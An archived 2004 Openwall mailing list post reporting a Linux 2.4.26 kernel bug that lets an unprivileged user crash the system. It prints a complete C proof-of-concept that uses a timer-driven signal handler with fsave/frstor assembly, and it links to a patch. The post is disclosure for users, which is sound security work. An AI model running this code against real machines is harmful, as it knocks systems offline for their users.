Openwall Project   /home  Owl  JtR  Pro  crypt  pam_passwdqc  tcb  phpass  scanlogd  popa3d  msulogin  /  Linux  BIND  /  advisories  presentations  /  services  donations  /  wordlists  passwords  /  news  community  lists  wiki  CVSweb  mirrors  signatures
bringing security into open environments
 
Password Recovery Resources on the Net
[<prev] [next>] [thread-next>] [month] [year] [list] 
Date: Tue, 15 Jun 2004 20:46:26 +0200
From: Krzychu <krzysiek@...urenet.pl>
To: owl-users@...ts.openwall.com
Subject: crash

Hi, 
it seems that this code:

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>
  
  static void Handler(int ignore)
  {
   char fpubuf[108];
   __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
   write(2, "*", 1);
   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }
  
  int main(int argc, char *argv[])
  {
   struct itimerval spec;
   signal(SIGALRM, Handler);
   spec.it_interval.tv_sec=0;
   spec.it_interval.tv_usec=100;
   spec.it_value.tv_sec=0;
   spec.it_value.tv_usec=100;
   setitimer(ITIMER_REAL, &spec, NULL);
   while(1)
    write(1, ".", 1);
  
   return 0;
  }

executed by normal user can really crash our owl boxes. I've tested 
in on 2.4.26-owl1 and the code "eat" 99% CPU's time. More info at:
http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

Fix of the problem is aviable at:
http://linuxreviews.org/news/2004-06-11_kernel_crash/24_kernel_ia32-and-x86_64-fix-fpu-state.patch.txt

Regards



-- 
Krzysztof Sniadoch
krzysiek@...urenet.pl 
http://www.securenet.pl 

"...qui desiderat pacem, praeparet bellum"
(...if you would have peace, be prepared for war) - Flavius Vegetius

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux